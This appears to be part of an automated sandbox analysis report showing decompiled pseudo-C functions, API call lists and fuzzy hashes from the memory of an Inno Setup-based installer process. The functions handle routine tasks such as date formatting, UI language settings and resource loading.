                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                                    • API String ID: 2030045667-3391638011
                                                                    • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                    • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                                    • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                    • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 69%
                                                                    			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                                    0x0042f9b8
                                                                    0x0042f9b8
                                                                    0x0042f9b9
                                                                    0x0042f9bb
                                                                    0x0042f9bf
                                                                    0x0042f9c2
                                                                    0x0042f9c5
                                                                    0x0042f9c8
                                                                    0x0042f9cf
                                                                    0x0042f9dc
                                                                    0x0042fb6d
                                                                    0x0042fb73
                                                                    0x0042fb8a
                                                                    0x0042fbac
                                                                    0x0042fbbb
                                                                    0x0042fbc7
                                                                    0x0042fbce
                                                                    0x0042fc88
                                                                    0x0042fc95
                                                                    0x0042fd0a
                                                                    0x0042fd19
                                                                    0x0042fd25
                                                                    0x0042fd2c
                                                                    0x0042fde0
                                                                    0x00000000
                                                                    0x0042fd32
                                                                    0x0042fd3c
                                                                    0x0042fdd6
                                                                    0x0042fddb
                                                                    0x00000000
                                                                    0x0042fd3e
                                                                    0x0042fd41
                                                                    0x0042fd42
                                                                    0x0042fd49
                                                                    0x0042fd4a
                                                                    0x0042fd4f
                                                                    0x0042fd52
                                                                    0x0042fd55
                                                                    0x0042fd5f
                                                                    0x0042fd6c
                                                                    0x0042fd6e
                                                                    0x0042fd6e
                                                                    0x0042fd92
                                                                    0x0042fd97
                                                                    0x0042fd9c
                                                                    0x0042fd9f
                                                                    0x0042fda2
                                                                    0x0042fdaf
                                                                    0x0042fdaf
                                                                    0x0042fd3c
                                                                    0x0042fd0c
                                                                    0x0042fd0c
                                                                    0x00000000
                                                                    0x0042fd0c
                                                                    0x0042fc97
                                                                    0x0042fc9a
                                                                    0x0042fc9b
                                                                    0x0042fca2
                                                                    0x0042fca3
                                                                    0x0042fca8
                                                                    0x0042fcab
                                                                    0x0042fcb1
                                                                    0x0042fcba
                                                                    0x0042fcc9
                                                                    0x0042fccb
                                                                    0x0042fccb
                                                                    0x0042fcde
                                                                    0x0042fce3
                                                                    0x0042fce6
                                                                    0x0042fce9
                                                                    0x0042fcf6
                                                                    0x0042fcf6
                                                                    0x0042fbd4
                                                                    0x0042fbde
                                                                    0x0042fc78
                                                                    0x0042fc7d
                                                                    0x00000000
                                                                    0x0042fbe0
                                                                    0x0042fbe3
                                                                    0x0042fbe4
                                                                    0x0042fbeb
                                                                    0x0042fbec
                                                                    0x0042fbf1
                                                                    0x0042fbf4
                                                                    0x0042fbf7
                                                                    0x0042fc01
                                                                    0x0042fc0e
                                                                    0x0042fc10
                                                                    0x0042fc10
                                                                    0x0042fc34
                                                                    0x0042fc39
                                                                    0x0042fc3e
                                                                    0x0042fc41
                                                                    0x0042fc44
                                                                    0x0042fc51
                                                                    0x0042fc51
                                                                    0x0042fbde
                                                                    0x0042fbae
                                                                    0x0042fbae
                                                                    0x00000000
                                                                    0x0042fbae
                                                                    0x0042fb8c
                                                                    0x0042fb98
                                                                    0x00000000
                                                                    0x0042fb98
                                                                    0x0042fb75
                                                                    0x0042fb7e
                                                                    0x00000000
                                                                    0x0042fb7e
                                                                    0x0042f9e2
                                                                    0x0042f9e5
                                                                    0x0042f9fc
                                                                    0x0042fa22
                                                                    0x0042fa31
                                                                    0x0042fa3d
                                                                    0x0042fa44
                                                                    0x0042fb02
                                                                    0x0042fb03
                                                                    0x0042fb0a
                                                                    0x0042fb0b
                                                                    0x0042fb10
                                                                    0x0042fb13
                                                                    0x0042fb19
                                                                    0x0042fb22
                                                                    0x0042fb35
                                                                    0x0042fb37
                                                                    0x0042fb37
                                                                    0x0042fb4a
                                                                    0x0042fb4f
                                                                    0x0042fb52
                                                                    0x0042fb55
                                                                    0x0042fb62
                                                                    0x0042fa4a
                                                                    0x0042fa54
                                                                    0x0042faf2
                                                                    0x0042faf7
                                                                    0x00000000
                                                                    0x0042fa56
                                                                    0x0042fa59
                                                                    0x0042fa5a
                                                                    0x0042fa61
                                                                    0x0042fa62
                                                                    0x0042fa67
                                                                    0x0042fa6a
                                                                    0x0042fa6d
                                                                    0x0042fa77
                                                                    0x0042fa88
                                                                    0x0042fa8a
                                                                    0x0042fa8a
                                                                    0x0042faae
                                                                    0x0042fab3
                                                                    0x0042fab8
                                                                    0x0042fabb
                                                                    0x0042fabe
                                                                    0x0042facb
                                                                    0x0042facb
                                                                    0x0042fa54
                                                                    0x0042fa24
                                                                    0x0042fa24
                                                                    0x00000000
                                                                    0x0042fa24
                                                                    0x0042f9fe
                                                                    0x0042fa0a
                                                                    0x00000000
                                                                    0x0042fa0a
                                                                    0x0042f9e7
                                                                    0x0042f9f0
                                                                    0x0042fde5
                                                                    0x0042fded
                                                                    0x0042fded
                                                                    0x0042f9e5

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                    • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                                    • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                    • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}














                                                                    0x0041c79d
                                                                    0x0041c7a0
                                                                    0x0041c7a2
                                                                    0x0041c7a6
                                                                    0x0041c7a7
                                                                    0x0041c7ac
                                                                    0x0041c7af
                                                                    0x0041c7b4
                                                                    0x0041c7c0
                                                                    0x0041c7cb
                                                                    0x0041c7d6
                                                                    0x0041c7dd
                                                                    0x0041c7f6
                                                                    0x0041c7df
                                                                    0x0041c7e7
                                                                    0x0041c7e7
                                                                    0x0041c80a
                                                                    0x0041c823
                                                                    0x0041c832
                                                                    0x0041c838
                                                                    0x0041c842
                                                                    0x0041c846
                                                                    0x0041c84b
                                                                    0x0041c84b
                                                                    0x0041c858
                                                                    0x0041c858
                                                                    0x0041c838
                                                                    0x0041c85f
                                                                    0x0041c862
                                                                    0x0041c865
                                                                    0x0041c872

                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DateFormatLocaleThread
                                                                    • String ID: $yyyy
                                                                    • API String ID: 3303714858-404527807
                                                                    • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                    • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                                    • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                    • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}





























                                                                    0x0041ef0a
                                                                    0x0041ef10
                                                                    0x0041ef13
                                                                    0x0041ef15
                                                                    0x0041ef19
                                                                    0x0041ef1a
                                                                    0x0041ef1f
                                                                    0x0041ef22
                                                                    0x0041ef2f
                                                                    0x0041ef3e
                                                                    0x0041ef6e
                                                                    0x0041ef7a
                                                                    0x0041ef7f
                                                                    0x0041ef85
                                                                    0x0041ef85
                                                                    0x0041efa7
                                                                    0x0041efac
                                                                    0x0041efb1
                                                                    0x0041efb8
                                                                    0x0041efc5
                                                                    0x0041efcf
                                                                    0x0041efd3
                                                                    0x0041efda
                                                                    0x0041efe4
                                                                    0x0041efe4
                                                                    0x0041efda
                                                                    0x0041eff5
                                                                    0x0041effa
                                                                    0x0041f009
                                                                    0x0041f016
                                                                    0x0041f021
                                                                    0x0041f027
                                                                    0x0041f034
                                                                    0x0041f03a
                                                                    0x0041f044
                                                                    0x0041f04a
                                                                    0x0041f051
                                                                    0x0041f057
                                                                    0x0041f05e
                                                                    0x0041f064
                                                                    0x0041f080
                                                                    0x0041f088
                                                                    0x0041f091
                                                                    0x0041f094
                                                                    0x0041f097
                                                                    0x0041f0a7

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                    • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                    • String ID:
                                                                    • API String ID: 3990497365-0
                                                                    • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                    • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                                    • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                    • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}





















                                                                    0x0040a6d0
                                                                    0x0040a6d2
                                                                    0x0040a6d6
                                                                    0x0040a6e2
                                                                    0x0040a6ec
                                                                    0x0040a6ef
                                                                    0x0040a6f1
                                                                    0x0040a6f8
                                                                    0x0040a6fb
                                                                    0x0040a70c
                                                                    0x0040a712
                                                                    0x0040a715
                                                                    0x0040a718
                                                                    0x0040a71b
                                                                    0x0040a721
                                                                    0x0040a727
                                                                    0x0040a737
                                                                    0x0040a737
                                                                    0x0040a740
                                                                    0x0040a745
                                                                    0x0040a749
                                                                    0x0040a74e
                                                                    0x0040a753
                                                                    0x0040a755
                                                                    0x0040a756
                                                                    0x0040a75d
                                                                    0x0040a765
                                                                    0x0040a76a
                                                                    0x0040a76a
                                                                    0x0040a770
                                                                    0x0040a773
                                                                    0x0040a773
                                                                    0x0040a75d
                                                                    0x0040a77a
                                                                    0x0040a781
                                                                    0x0040a781
                                                                    0x0040a78a
                                                                    0x0040a794
                                                                    0x0040a7a2
                                                                    0x0040a7aa
                                                                    0x0040a7c7
                                                                    0x0040a7c7
                                                                    0x0040a7cf
                                                                    0x00000000
                                                                    0x0040a7d7
                                                                    0x0040a7e1

                                                                    APIs
                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                    • String ID:
                                                                    • API String ID: 2255706666-0
                                                                    • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                    • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                                    • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                    • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}






                                                                    0x004af9ff
                                                                    0x004afa03
                                                                    0x004afa05
                                                                    0x004afa05
                                                                    0x004afa15
                                                                    0x004afa17
                                                                    0x004afa17
                                                                    0x004afa24
                                                                    0x004afa28
                                                                    0x004afa2a
                                                                    0x004afa2a
                                                                    0x004afa35
                                                                    0x004afa39
                                                                    0x004afa3b
                                                                    0x004afa3b
                                                                    0x004afa43

                                                                    APIs
                                                                    • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                                    • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
